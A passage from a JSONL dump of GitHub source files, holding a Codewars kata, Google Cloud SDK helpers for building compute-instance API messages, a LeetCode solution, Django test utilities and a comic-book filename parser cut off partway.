mx\n","repo_name":"anuanjalijha/DSA_DictionaryAndMaps","sub_path":"LongestConsecutiveSequence.py","file_name":"LongestConsecutiveSequence.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"16003161706","text":"# Rectangle into Squares\n# Level: 6kyu\n'''\nProblem 
Description: The drawing below gives an idea of how to cut a given \"true\" rectangle into squares \n(\"true\" rectangle meaning that the two dimensions are different).\n\nalternative text\n\nCan you translate this drawing into an algorithm?\n\nYou will be given two dimensions\n\n a positive integer length (parameter named lng)\n a positive integer width (parameter named wdth)\n\nYou will return an array with the size of each of the squares.\n\n sqInRect(5, 3) should return [3, 2, 1, 1]\n sqInRect(3, 5) should return [3, 2, 1, 1]\n'''\n\n\ndef sqInRect(lng, wdth):\n if lng == wdth:\n return None\n ans = []\n while lng != wdth:\n if lng > wdth:\n lng -= wdth\n ans.append(wdth)\n elif wdth > lng:\n wdth -= lng\n ans.append(lng)\n\n ans.append(lng)\n return ans\n\n# Test Cases\n\nprint(sqInRect(5, 5))\nprint(sqInRect(5, 3))\nprint(sqInRect(3, 5))\n","repo_name":"teabag98/A-Kata-A-Day","sub_path":"Python/Rectangle_into_Squares.py","file_name":"Rectangle_into_Squares.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"73"} +{"seq_id":"33358718905","text":"import collections\nimport re\n\nfrom googlecloudsdk.api_lib.compute import alias_ip_range_utils\nfrom googlecloudsdk.api_lib.compute import constants\nfrom googlecloudsdk.api_lib.compute import csek_utils\nfrom googlecloudsdk.api_lib.compute import image_utils\nfrom googlecloudsdk.api_lib.compute import utils\nfrom googlecloudsdk.calliope import exceptions\nfrom googlecloudsdk.command_lib.compute import scope as compute_scopes\nfrom googlecloudsdk.command_lib.compute.instances import flags\nfrom googlecloudsdk.command_lib.util.ssh import ssh\nfrom googlecloudsdk.core import log\nimport ipaddr\n\n\nEMAIL_REGEX = re.compile(r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$)')\n\n\ndef GetCpuRamFromCustomName(name):\n \"\"\"Gets the CPU and memory specs from the custom machine type name.\n\n Args:\n name: the custom machine type name for the 'instance create' call\n\n Returns:\n A two-tuple with the number of cpu and amount of memory for the custom\n machine type\n\n custom_cpu, the number of cpu desired for the custom machine type instance\n custom_memory_mib, the amount of ram desired in MiB for the custom machine\n type instance\n None for both variables otherwise\n \"\"\"\n check_custom = re.search('custom-([0-9]+)-([0-9]+)', name)\n if check_custom:\n custom_cpu = check_custom.group(1)\n custom_memory_mib = check_custom.group(2)\n return custom_cpu, custom_memory_mib\n return None, None\n\n\ndef GetNameForCustom(custom_cpu, custom_memory_mib, ext=False):\n \"\"\"Creates a custom machine type name from the desired CPU and memory specs.\n\n Args:\n custom_cpu: the number of cpu desired for the custom machine type\n custom_memory_mib: the amount of ram desired in MiB for the custom machine\n type instance\n ext: extended custom machine type should be used if true\n\n Returns:\n The custom machine type name for the 'instance create' call\n \"\"\"\n machine_type = 'custom-{0}-{1}'.format(custom_cpu, custom_memory_mib)\n if ext:\n machine_type += '-ext'\n return machine_type\n\n\ndef InterpretMachineType(machine_type, custom_cpu, custom_memory, ext=True):\n \"\"\"Interprets the machine type for the instance.\n\n Args:\n machine_type: name of existing machine type, eg. 
n1-standard\n custom_cpu: number of CPU cores for custom machine type,\n custom_memory: amount of RAM memory in bytes for custom machine type,\n ext: extended custom machine type should be used if true,\n\n Returns:\n A string representing the URL naming a machine-type.\n\n Raises:\n exceptions.RequiredArgumentException when only one of the two custom\n machine type flags are used.\n exceptions.InvalidArgumentException when both the machine type and\n custom machine type flags are used to generate a new instance.\n \"\"\"\n # Setting the machine type\n machine_type_name = constants.DEFAULT_MACHINE_TYPE\n if machine_type:\n machine_type_name = machine_type\n\n # Setting the specs for the custom machine.\n if custom_cpu or custom_memory or ext:\n if not custom_cpu:\n raise exceptions.RequiredArgumentException(\n '--custom-cpu', 'Both [--custom-cpu] and [--custom-memory] must be '\n 'set to create a custom machine type instance.')\n if not custom_memory:\n raise exceptions.RequiredArgumentException(\n '--custom-memory', 'Both [--custom-cpu] and [--custom-memory] must '\n 'be set to create a custom machine type instance.')\n if machine_type:\n raise exceptions.InvalidArgumentException(\n '--machine-type', 'Cannot set both [--machine-type] and '\n '[--custom-cpu]/[--custom-memory] for the same instance.')\n custom_type_string = GetNameForCustom(\n custom_cpu,\n # converting from B to MiB.\n int(custom_memory / (2 ** 20)),\n ext)\n\n # Updating the machine type that is set for the URIs\n machine_type_name = custom_type_string\n return machine_type_name\n\n\ndef CheckCustomCpuRamRatio(compute_client, project, zone, machine_type_name):\n \"\"\"Checks that the CPU and memory ratio is a supported custom instance type.\n\n Args:\n compute_client: GCE API client,\n project: a project,\n zone: the zone of the instance(s) being created,\n machine_type_name: The machine type of the instance being created.\n\n Returns:\n Nothing. 
Function acts as a bound checker, and will raise an exception from\n within the function if needed.\n\n Raises:\n utils.RaiseToolException if a custom machine type ratio is out of bounds.\n \"\"\"\n messages = compute_client.messages\n compute = compute_client.apitools_client\n if 'custom' in machine_type_name:\n mt_get_pb = messages.ComputeMachineTypesGetRequest(\n machineType=machine_type_name,\n project=project,\n zone=zone)\n mt_get_reqs = [(compute.machineTypes, 'Get', mt_get_pb)]\n errors = []\n\n # Makes a 'machine-types describe' request to check the bounds\n _ = list(compute_client.MakeRequests(\n requests=mt_get_reqs,\n errors_to_collect=errors))\n\n if errors:\n utils.RaiseToolException(\n errors,\n error_message='Could not fetch machine type:')\n\n\ndef CreateServiceAccountMessages(messages, scopes, service_account):\n \"\"\"Returns a list of ServiceAccount messages corresponding to scopes.\"\"\"\n silence_deprecation_warning = False\n if scopes is None:\n scopes = constants.DEFAULT_SCOPES\n # if user provided --no-service-account, it is already verified that\n # scopes == [] and thus service_account value will not be used\n service_account_specified = service_account is not None\n if service_account is None:\n service_account = 'default'\n\n accounts_to_scopes = collections.defaultdict(list)\n for scope in scopes:\n parts = scope.split('=')\n if len(parts) == 1:\n account = service_account\n scope_uri = scope\n elif len(parts) == 2:\n account, scope_uri = parts\n if service_account_specified:\n raise exceptions.InvalidArgumentException(\n '--scopes',\n 'It is illegal to mix old --scopes flag format '\n '[--scopes {0}={1}] with [--service-account ACCOUNT] flag. Use '\n '[--scopes {1} --service-account {2}] instead.'\n .format(account, scope_uri, service_account))\n # TODO(b/33688878) Remove support for this deprecated format\n if not silence_deprecation_warning:\n log.warning(\n 'Flag format --scopes [ACCOUNT=]SCOPE, [[ACCOUNT=]SCOPE, ...] is '\n 'deprecated and will be removed 24th Jan 2018. Use --scopes SCOPE'\n '[, SCOPE...] --service-account ACCOUNT instead.')\n silence_deprecation_warning = True # Do not warn again for each scope\n else:\n raise exceptions.ToolException(\n '[{0}] is an illegal value for [--scopes]. Values must be of the '\n 'form [SCOPE] or [ACCOUNT=SCOPE].'.format(scope))\n\n if service_account != 'default' and not ssh.Remote.FromArg(service_account):\n raise exceptions.InvalidArgumentException(\n '--service-account',\n 'Invalid format: expected default or user@domain.com, received ' +\n service_account)\n\n # Expands the scope if the user provided an alias like\n # \"compute-rw\".\n scope_uri = constants.SCOPES.get(scope_uri, [scope_uri])\n accounts_to_scopes[account].extend(scope_uri)\n\n res = []\n for account, scopes in sorted(accounts_to_scopes.iteritems()):\n res.append(messages.ServiceAccount(email=account,\n scopes=sorted(scopes)))\n return res\n\n\ndef CreateOnHostMaintenanceMessage(messages, maintenance_policy):\n \"\"\"Create on-host-maintenance message for VM.\"\"\"\n if maintenance_policy:\n on_host_maintenance = messages.Scheduling.OnHostMaintenanceValueValuesEnum(\n maintenance_policy)\n else:\n on_host_maintenance = None\n return on_host_maintenance\n\n\ndef CreateSchedulingMessage(\n messages, maintenance_policy, preemptible, restart_on_failure):\n \"\"\"Create scheduling message for VM.\"\"\"\n # Note: We always specify automaticRestart=False for preemptible VMs. 
This\n # makes sense, since no-restart-on-failure is defined as \"store-true\", and\n # thus can't be given an explicit value. Hence it either has its default\n # value (in which case we override it for convenience's sake to the only\n # setting that makes sense for preemptible VMs), or the user actually\n # specified no-restart-on-failure, the only usable setting.\n on_host_maintenance = CreateOnHostMaintenanceMessage(messages,\n maintenance_policy)\n if preemptible:\n scheduling = messages.Scheduling(automaticRestart=False,\n onHostMaintenance=on_host_maintenance,\n preemptible=True)\n else:\n scheduling = messages.Scheduling(automaticRestart=restart_on_failure,\n onHostMaintenance=on_host_maintenance)\n return scheduling\n\n\ndef CreateMachineTypeUris(\n resources, compute_client,\n machine_type, custom_cpu, custom_memory, ext, instance_refs):\n \"\"\"Create machine type URIs for given args and instance references.\"\"\"\n # The element at index i is the machine type URI for instance\n # i. We build this list here because we want to delay work that\n # requires API calls as much as possible. This leads to a better\n # user experience because the tool can fail fast upon a spelling\n # mistake instead of delaying the user by making API calls whose\n # purpose has already been rendered moot by the spelling mistake.\n machine_type_uris = []\n\n # Setting the machine type\n machine_type_name = InterpretMachineType(\n machine_type, custom_cpu, custom_memory, ext)\n\n for instance_ref in instance_refs:\n # Check to see if the custom machine type ratio is supported\n CheckCustomCpuRamRatio(compute_client,\n instance_ref.project,\n instance_ref.zone,\n machine_type_name)\n machine_type_uris.append(\n resources.Parse(\n machine_type_name,\n collection='compute.machineTypes',\n params={\n 'project': instance_ref.project,\n 'zone': instance_ref.zone\n }).SelfLink())\n\n return machine_type_uris\n\n\ndef CreateNetworkInterfaceMessage(resources,\n compute_client,\n network,\n subnet,\n private_network_ip,\n no_address,\n address,\n instance_refs,\n alias_ip_ranges_string=None,\n network_tier=None,\n no_public_dns=None,\n public_dns=None,\n no_public_ptr=None,\n public_ptr=None,\n no_public_ptr_domain=None,\n public_ptr_domain=None):\n \"\"\"Returns a new NetworkInterface message.\"\"\"\n # TODO(b/30460572): instance reference should have zone name, not zone URI.\n region = utils.ZoneNameToRegionName(instance_refs[0].zone.split('/')[-1])\n messages = compute_client.messages\n network_interface = messages.NetworkInterface()\n # By default interface is attached to default network. 
If network or subnet\n # are specified they're used instead.\n if subnet is not None:\n subnet_ref = resources.Parse(\n subnet,\n collection='compute.subnetworks',\n params={\n 'project': instance_refs[0].project,\n 'region': region\n })\n network_interface.subnetwork = subnet_ref.SelfLink()\n if network is not None:\n network_ref = resources.Parse(\n network,\n params={\n 'project': instance_refs[0].project,\n },\n collection='compute.networks')\n network_interface.network = network_ref.SelfLink()\n elif subnet is None:\n network_ref = resources.Parse(\n constants.DEFAULT_NETWORK,\n params={'project': instance_refs[0].project},\n collection='compute.networks')\n network_interface.network = network_ref.SelfLink()\n\n if private_network_ip is not None:\n # Try interpreting the address as IPv4 or IPv6.\n try:\n ipaddr.IPAddress(private_network_ip)\n network_interface.networkIP = private_network_ip\n except ValueError:\n # ipaddr could not resolve as an IPv4 or IPv6 address.\n network_interface.networkIP = flags.GetAddressRef(\n resources, private_network_ip, region).SelfLink()\n\n if alias_ip_ranges_string:\n network_interface.aliasIpRanges = (\n alias_ip_range_utils.CreateAliasIpRangeMessagesFromString(\n messages, True, alias_ip_ranges_string))\n\n if not no_address:\n access_config = messages.AccessConfig(\n name=constants.DEFAULT_ACCESS_CONFIG_NAME,\n type=messages.AccessConfig.TypeValueValuesEnum.ONE_TO_ONE_NAT)\n if network_tier is not None:\n access_config.networkTier = (messages.AccessConfig.\n NetworkTierValueValuesEnum(network_tier))\n\n # If the user provided an external IP, populate the access\n # config with it.\n # TODO(b/25278937): plays poorly when creating multiple instances\n if len(instance_refs) == 1:\n address_resource = flags.ExpandAddressFlag(\n resources, compute_client, address, region)\n if address_resource:\n access_config.natIP = address_resource\n\n if no_public_dns is True:\n access_config.setPublicDns = False\n elif public_dns is True:\n access_config.setPublicDns = True\n\n if no_public_ptr is True:\n access_config.setPublicPtr = False\n elif public_ptr is True:\n access_config.setPublicPtr = True\n\n if no_public_ptr_domain is not True and public_ptr_domain is not None:\n access_config.publicPtrDomainName = public_ptr_domain\n\n network_interface.accessConfigs = [access_config]\n\n return network_interface\n\n\ndef CreateNetworkInterfaceMessages(resources, compute_client,\n network_interface_arg, instance_refs,\n support_network_tier):\n \"\"\"Create network interface messages.\n\n Args:\n resources: generates resource references.\n compute_client: creates resources.\n network_interface_arg: CLI argument specyfying network interfaces.\n instance_refs: reference to instances that will own the generated\n interfaces.\n support_network_tier: indicates if network tier is supported.\n Returns:\n list, items are NetworkInterfaceMessages.\n \"\"\"\n result = []\n if network_interface_arg:\n for interface in network_interface_arg:\n address = interface.get('address', None)\n no_address = 'no-address' in interface\n if support_network_tier:\n network_tier = interface.get('network-tier',\n constants.DEFAULT_NETWORK_TIER)\n else:\n network_tier = None\n\n result.append(CreateNetworkInterfaceMessage(\n resources, compute_client, interface.get('network', None),\n interface.get('subnet', None),\n interface.get('private-network-ip', None), no_address,\n address, instance_refs, interface.get('aliases', None), network_tier))\n return result\n\n\ndef 
ParseDiskResource(resources, name, project, zone, type_):\n if type_ == compute_scopes.ScopeEnum.REGION:\n return resources.Parse(\n name,\n collection='compute.regionDisks',\n params={\n 'project': project,\n 'region': utils.ZoneNameToRegionName(zone)\n })\n else:\n return resources.Parse(\n name,\n collection='compute.disks',\n params={\n 'project': project,\n 'zone': zone\n })\n\n\ndef CreatePersistentAttachedDiskMessages(\n resources, compute_client, csek_keys, disks, instance_ref):\n \"\"\"Returns a list of AttachedDisk messages and the boot disk's reference.\"\"\"\n disks_messages = []\n boot_disk_ref = None\n\n messages = compute_client.messages\n compute = compute_client.apitools_client\n for disk in disks:\n name = disk['name']\n\n # Resolves the mode.\n mode_value = disk.get('mode', 'rw')\n if mode_value == 'rw':\n mode = messages.AttachedDisk.ModeValueValuesEnum.READ_WRITE\n else:\n mode = messages.AttachedDisk.ModeValueValuesEnum.READ_ONLY\n\n boot = disk.get('boot') == 'yes'\n auto_delete = disk.get('auto-delete') == 'yes'\n\n if 'scope' in disk and disk['scope'] == 'regional':\n scope = compute_scopes.ScopeEnum.REGION\n else:\n scope = compute_scopes.ScopeEnum.ZONE\n disk_ref = ParseDiskResource(resources, name, instance_ref.project,\n instance_ref.zone, scope)\n\n if boot:\n boot_disk_ref = disk_ref\n\n # TODO(b/36051031) drop test after CSEK goes GA\n if csek_keys:\n disk_key_or_none = csek_utils.MaybeLookupKeyMessage(\n csek_keys, disk_ref, compute)\n kwargs = {'diskEncryptionKey': disk_key_or_none}\n else:\n kwargs = {}\n\n attached_disk = messages.AttachedDisk(\n autoDelete=auto_delete,\n boot=boot,\n deviceName=disk.get('device-name'),\n mode=mode,\n source=disk_ref.SelfLink(),\n type=messages.AttachedDisk.TypeValueValuesEnum.PERSISTENT,\n **kwargs)\n\n # The boot disk must end up at index 0.\n if boot:\n disks_messages = [attached_disk] + disks_messages\n else:\n disks_messages.append(attached_disk)\n\n return disks_messages, boot_disk_ref\n\n\ndef CreatePersistentCreateDiskMessages(compute_client,\n resources, csek_keys, create_disks,\n instance_ref):\n \"\"\"Returns a list of AttachedDisk messages for newly creating disks.\n\n Args:\n compute_client: creates resources,\n resources: parser of resources,\n csek_keys: customer suplied encryption keys,\n create_disks: disk objects - contains following properties\n * name - the name of disk,\n * mode - 'rw' (R/W), 'ro' (R/O) access mode,\n * disk-size - the size of the disk,\n * disk-type - the type of the disk (HDD or SSD),\n * image - the name of the image to initialize from,\n * image-family - the image family name,\n * image-project - the project name that has the image,\n * auto-delete - whether disks is deleted when VM is deleted,\n * device-name - device name on VM.\n instance_ref: reference to the instance that will own the new disks.\n Returns:\n list of API messages for attached disks\n \"\"\"\n disks_messages = []\n\n messages = compute_client.messages\n compute = compute_client.apitools_client\n for disk in create_disks or []:\n name = disk.get('name')\n\n # Resolves the mode.\n mode_value = disk.get('mode', 'rw')\n if mode_value == 'rw':\n mode = messages.AttachedDisk.ModeValueValuesEnum.READ_WRITE\n else:\n mode = messages.AttachedDisk.ModeValueValuesEnum.READ_ONLY\n\n auto_delete_value = disk.get('auto-delete', 'yes')\n auto_delete = auto_delete_value == 'yes'\n\n disk_size_gb = utils.BytesToGb(disk.get('size'))\n disk_type = disk.get('type')\n if disk_type:\n disk_type_ref = resources.Parse(disk_type,\n 
collection='compute.diskTypes',\n params={\n 'project': instance_ref.project,\n 'zone': instance_ref.zone\n })\n\n disk_type_uri = disk_type_ref.SelfLink()\n else:\n disk_type_ref = None\n disk_type_uri = None\n\n image_expander = image_utils.ImageExpander(compute_client,\n resources)\n image_uri, _ = image_expander.ExpandImageFlag(\n user_project=instance_ref.project,\n image=disk.get('image'),\n image_family=disk.get('image-family'),\n image_project=disk.get('image-project'),\n return_image_resource=False)\n\n image_key = None\n disk_key = None\n if csek_keys:\n image_key = csek_utils.MaybeLookupKeyMessagesByUri(csek_keys,\n resources,\n [image_uri],\n compute)\n if name:\n disk_ref = resources.Parse(name,\n collection='compute.disks',\n params={'zone': instance_ref.zone})\n disk_key = csek_utils.MaybeLookupKeyMessage(csek_keys, disk_ref,\n compute)\n\n create_disk = messages.AttachedDisk(\n autoDelete=auto_delete,\n boot=False,\n deviceName=disk.get('device-name'),\n initializeParams=messages.AttachedDiskInitializeParams(\n diskName=name,\n sourceImage=image_uri,\n diskSizeGb=disk_size_gb,\n diskType=disk_type_uri,\n sourceImageEncryptionKey=image_key),\n mode=mode,\n type=messages.AttachedDisk.TypeValueValuesEnum.PERSISTENT,\n diskEncryptionKey=disk_key)\n\n disks_messages.append(create_disk)\n\n return disks_messages\n\n\ndef CreateAcceleratorConfigMessages(msgs, accelerator_type_ref,\n accelerator_count):\n \"\"\"Returns a list of accelerator config messages.\n\n Args:\n msgs: tracked GCE API messages.\n accelerator_type_ref: reference to the accelerator type.\n accelerator_count: number of accelerators to attach to the VM.\n\n Returns:\n a list of accelerator config message that specifies the type and number of\n accelerators to attach to an instance.\n \"\"\"\n\n accelerator_config = msgs.AcceleratorConfig(\n acceleratorType=accelerator_type_ref.SelfLink(),\n acceleratorCount=accelerator_count)\n return [accelerator_config]\n\n\ndef CreateDefaultBootAttachedDiskMessage(\n compute_client, resources, disk_type, disk_device_name, disk_auto_delete,\n disk_size_gb, require_csek_key_create, image_uri, instance_ref,\n csek_keys=None):\n \"\"\"Returns an AttachedDisk message for creating a new boot disk.\"\"\"\n messages = compute_client.messages\n compute = compute_client.apitools_client\n\n if disk_type:\n disk_type_ref = resources.Parse(\n disk_type,\n collection='compute.diskTypes',\n params={\n 'project': instance_ref.project,\n 'zone': instance_ref.zone\n })\n disk_type_uri = disk_type_ref.SelfLink()\n else:\n disk_type_ref = None\n disk_type_uri = None\n\n if csek_keys:\n # If we're going to encrypt the boot disk make sure that we select\n # a name predictably, instead of letting the API deal with name\n # conflicts automatically.\n #\n # Note that when csek keys are being used we *always* want force this\n # even if we don't have any encryption key for default disk name.\n #\n # Consider the case where the user's key file has a key for disk `foo-1`\n # and no other disk. Assume she runs\n # gcloud compute instances create foo --csek-key-file f \\\n # --no-require-csek-key-create\n # and gcloud doesn't force the disk name to be `foo`. The API might\n # select name `foo-1` for the new disk, but has no way of knowing\n # that the user has a key file mapping for that disk name. 
That\n # behavior violates the principle of least surprise.\n #\n # Instead it's better for gcloud to force a specific disk name in the\n # instance create, and fail if that name isn't available.\n\n effective_boot_disk_name = (\n disk_device_name or instance_ref.Name())\n\n disk_ref = resources.Parse(effective_boot_disk_name,\n collection='compute.disks',\n params={\n 'project': instance_ref.project,\n 'zone': instance_ref.zone\n })\n disk_key_or_none = csek_utils.MaybeToMessage(\n csek_keys.LookupKey(disk_ref, require_csek_key_create),\n compute)\n [image_key_or_none] = csek_utils.MaybeLookupKeyMessagesByUri(\n csek_keys, resources, [image_uri], compute)\n kwargs_init_parms = {'sourceImageEncryptionKey': image_key_or_none}\n kwargs_disk = {'diskEncryptionKey': disk_key_or_none}\n else:\n kwargs_disk = {}\n kwargs_init_parms = {}\n effective_boot_disk_name = disk_device_name\n\n return messages.AttachedDisk(\n autoDelete=disk_auto_delete,\n boot=True,\n deviceName=effective_boot_disk_name,\n initializeParams=messages.AttachedDiskInitializeParams(\n sourceImage=image_uri,\n diskSizeGb=disk_size_gb,\n diskType=disk_type_uri,\n **kwargs_init_parms),\n mode=messages.AttachedDisk.ModeValueValuesEnum.READ_WRITE,\n type=messages.AttachedDisk.TypeValueValuesEnum.PERSISTENT,\n **kwargs_disk)\n\n\ndef UseExistingBootDisk(disks):\n \"\"\"Returns True if the user has specified an existing boot disk.\"\"\"\n return any(disk.get('boot') == 'yes' for disk in disks)\n\n\ndef CreateLocalSsdMessage(resources, messages, device_name, interface,\n size_bytes=None, zone=None, project=None):\n \"\"\"Create a message representing a local ssd.\"\"\"\n\n if zone:\n disk_type_ref = resources.Parse(\n 'local-ssd',\n collection='compute.diskTypes',\n params={\n 'project': project,\n 'zone': zone\n }\n )\n disk_type = disk_type_ref.SelfLink()\n else:\n disk_type = 'local-ssd'\n\n maybe_interface_enum = (\n messages.AttachedDisk.InterfaceValueValuesEnum(interface)\n if interface else None)\n\n local_ssd = messages.AttachedDisk(\n type=messages.AttachedDisk.TypeValueValuesEnum.SCRATCH,\n autoDelete=True,\n deviceName=device_name,\n interface=maybe_interface_enum,\n mode=messages.AttachedDisk.ModeValueValuesEnum.READ_WRITE,\n initializeParams=messages.AttachedDiskInitializeParams(\n diskType=disk_type),\n )\n\n if size_bytes is not None:\n local_ssd.diskSizeGb = utils.BytesToGb(size_bytes)\n\n return local_ssd\n","repo_name":"springml/case_routing","sub_path":"google-cloud-sdk/lib/googlecloudsdk/api_lib/compute/instance_utils.py","file_name":"instance_utils.py","file_ext":"py","file_size_in_byte":26294,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"73"} +{"seq_id":"4323130439","text":"class Solution:\n def minSwapsCouples(self, row: List[int]) -> int:\n pos = {x:i for i,x in enumerate(row)}\n ans = 0\n for i in range(0,len(row),2):\n x = row[i]\n if row[i+1] != (x^1):\n y = x^1\n j = pos[y]\n row[i+1],row[j] = row[j],row[i+1]\n pos[row[j]] = j\n pos[row[i+1]] = i+1\n ans += 1\n return ans","repo_name":"chadexplains/leetcode","sub_path":"765/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"33940463529","text":"from django.apps import apps\nfrom django.test import TestCase\n\nfrom tables.models import ModelSchema\nfrom tables.constants import TABLE_APP_LABEL\n\n\nDEFAULT_DYNAMIC_MODELS_SET = {'modelschema', 'fieldschema'}\n\n\ndef 
all_dynamic_models_loaded() -> set[str]:\n return set(apps.all_models[TABLE_APP_LABEL].keys())\n\n\nclass TestCaseDynamicModels(TestCase):\n def setUp(self) -> None:\n super().setUp()\n # sanity check, no dynamic model leaked during tests\n self.assertEqual(\n all_dynamic_models_loaded(),\n DEFAULT_DYNAMIC_MODELS_SET\n )\n\n def tearDown(self) -> None:\n super().tearDown()\n for schema in ModelSchema.objects.all():\n schema.delete()\n\n # sanity check, all dynamic model should be now unregistered\n self.assertEqual(\n all_dynamic_models_loaded(),\n DEFAULT_DYNAMIC_MODELS_SET\n )\n","repo_name":"knrd/dynamic-tables","sub_path":"tables/tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"10749631979","text":"'''\r\nThis is a modified version of cbanack's fnamparser module from his\r\nComicVineScraper plugin (https://github.com/cbanack/comic-vine-scraper)\r\n\r\nThis module contains functions for extracting and parsing details out\r\nof comic book filenames.\r\n\r\nCreated on Oct 23, 2011\r\n@author: cbanack\r\n\r\nOriginally modified on Aug 10, 2016\r\n@author: hmhrex\r\n'''\r\nimport re,os\r\nfrom . import utils\r\n\r\n\r\n#==============================================================================\r\ndef extract( filename_s ):\r\n '''\r\n Takes the filename of a comic book, and extracts three strings out of it: the\r\n series name, the issue number, and the issue year. These three pieces\r\n of information are returned as a triple, i.e. (\"batman\", \"344\", \"2004\").\r\n\r\n This function never returns None, and it will ALWAYS return the triple with\r\n at least a non-empty series name (even if it is just \"unknown\"), but the\r\n issue number and year may be \"\" if they couldn't be determined.\r\n '''\r\n # remove the file extension, unless it's the whole filename\r\n name_s = os.path.basename(filename_s)\r\n last_period = name_s.rfind(r\".\")\r\n name_s = name_s if last_period <= 0 else name_s[0:last_period]\r\n\r\n # see if the comic matches the following format, and if so, remove everything\r\n # after the first number:\r\n # \"nnn series name #xx (etc) (etc)\" -> \"series name #xx (etc) (etc)\"\r\n match = re.match(r\"^\\s*(\\d+)[\\s._-]+\" + # \"nnn\"\r\n r\"([^#]+?\" + # \"series name\"\r\n r\"#-?\\d+.*)\", name_s) # \"#xx (etc) (etc)\"\r\n if match: name_s = match.group(2)\r\n\r\n # see if the comic matches the following format, and if so, remove everything\r\n # after the first number that isn't in brackets:\r\n # \"series name #xxx - title (etc) (etc)\" -> \"series name #xxx (ect) (etc)\r\n match = re.match(r\"^((?:[a-zA-Z,.-]+\\s+)+\" + # \"series name\"\r\n r\"#?(?:\\d+[.0-9]*))\\s*(?:-)\" + # \"#xxx -\"\r\n r\".*?((\\(.*)?)$\", name_s) # \"title (etc) (etc)\"\r\n\r\n # TOCHANGE: log.debug()\r\n if match:\r\n #log.debug(name_s)\r\n name_s = match.group(1) + \" \" + match.group(2)\r\n #log.debug(\" -> \", name_s)\r\n\r\n # try the extraction. 
if anything goes wrong, or if we come up with a blank\r\n # series name, revert to the filename (without extension) as series name\r\n try:\r\n retval = __extract(name_s)\r\n if retval[0].strip() == \"\":\r\n raise Exception(\"parsed blank series name\")\r\n\r\n # TOCHANGE: log.debug()\r\n except:\r\n #log.debug_exc(\"Recoverable error extracting from '\" + name_s + \"':\")\r\n retval = name_s, \"\", \"\"\r\n return retval\r\n\r\n\r\n\r\n#==============================================================================\r\ndef __extract(name_s):\r\n ''' Internal implementation of the similarly named method in this package '''\r\n\r\n # 1. 's' is the name of our 'working' series name. we'll slowly strip the\r\n # 'non-series name' data out of it, til what's left is the series name\r\n s = name_s\r\n\r\n # 2. but first, see if there's a volume/year in there.\r\n volume_year_s = __extract_year(s)\r\n\r\n # 3. strip out all bracketed data from the name\r\n def recurse_sub(pattern, s):\r\n while re.search(pattern, s):\r\n s = re.sub(pattern, \"\", s)\r\n return s\r\n s = recurse_sub(r\"\\([^\\(]*?\\)\", s)\r\n s = recurse_sub(r\"\\{[^\\{]*?\\}\", s)\r\n s = recurse_sub(r\"\\[[^\\[]*?\\]\", s)\r\n\r\n # 4. clean out underscores\r\n s = re.sub(r\"_\", \" \", s)\r\n\r\n # 5. remove all trace of volume from the name (like \"vol. 2a\" and \"vol -3.1\")\r\n s = re.sub(r\"(?i)(\\b((vol)\\.?|volume))\", \"\", s)\r\n\r\n # 6. remove all page counts, ie. \"245p\" or \"50 pages\"\r\n s = re.sub(r\"(?i)\\b[.,]?\\s*\\d+\\s*(p|pg|pgs|pages)\\b[.,]?\", \"\", s)\r\n\r\n # 7. remove anything following a similar pattern to \"02 of 02 covers\"\r\n s = re.sub(r\"(?i)(\\d+\\s*of\\s*\\d+\\s*covers)\", \"\", s)\r\n\r\n # 8. if the name has things like \"4 of 5\", remove the \" of 5\" part\r\n # also, if the name has 3-6, remove the -6 part. note that we'll\r\n # try to handle the word \"of\" in a few common languages, like french/\r\n # spanish (de), italian (di), german (von), dutch (van) or polish (z)\r\n s = re.sub(r\"(?i)(?<=\\d)(\\s*(of|de|di|von|van|z)\\s*#*\\d+)\", \"\", s)\r\n s = re.sub(r\"(?<=\\d)(-\\d+)\", \"\", s)\r\n\r\n # 9. if this is one of those comic books that replaces all spaces with\r\n # dashes or periods, then strip the dashes and/or periods out. otherwise\r\n # leave them in (because they might be important, like minus signs or\r\n # something.)\r\n if \"-\" in s and \" \" not in s:\r\n s = re.sub(r\"(? 1 and re.match(pattern,s):\r\n s = re.sub(pattern, \"\", s, 1)\r\n matches = __extract_numbers(s)\r\n\r\n # 12. if we parsed out some potential issue numbers, designate the LAST\r\n # (rightmost) one as the actual issue number, and remove it from the name\r\n if len(matches) > 0:\r\n issue_num_s = matches[-1].group(2)\r\n series_s = s[:matches[-1].start(0)] +s[matches[-1].end(0):]\r\n # 10a. strip off leading/trailing zeroes\r\n matches = re.match(\"^(0+)([0-9].*)$\", issue_num_s)\r\n issue_num_s = matches.group(2) if matches else issue_num_s\r\n\r\n #TOCHANGE: utils.is_number() and utils.sstr()\r\n if re.match(\"^-?[.0-9]+$\", issue_num_s) and utils.is_number(issue_num_s):\r\n issue_num_s = utils.sstr(float(issue_num_s) \\\r\n if '.' in issue_num_s else int(issue_num_s))\r\n else:\r\n issue_num_s = \"\"\r\n series_s = s\r\n\r\n # 13. 
contract repeating whitespace, and strip bad chars off the ends\r\n series_s = re.sub(r\"\\s{2,}\", \" \", series_s).strip(\" ,-_\")\r\n\r\n return [series_s, issue_num_s, volume_year_s]\r\n\r\n\r\n#==============================================================================\r\ndef __extract_year(s):\r\n '''\r\n Searches through the given string left-to-right, seeing if an intelligible\r\n publication year can be extracted. if it can, it will be returned as a\r\n four digit string, otherwise \"\" will be returned.\r\n '''\r\n\r\n retval = \"\"\r\n\r\n # type one years appear exactly as \"V2003\". there's a popular comicrack\r\n # script that creates dates that look like this, so parse em if we can\r\n results = [ x[1] for x in\r\n re.findall(r\"(?i)(^|[, -_])v(\\d{4})($|[, -_])\",s) if __isYear(x[1]) ]\r\n\r\n if len(results) == 1:\r\n retval = results[0]\r\n else:\r\n # roughly, we're looking for a year or year range inside brackets\r\n # so: [2003], (2004-6), {2000-2010}, etc.\r\n\r\n # 1. get everything substring is strictly inside only one set of 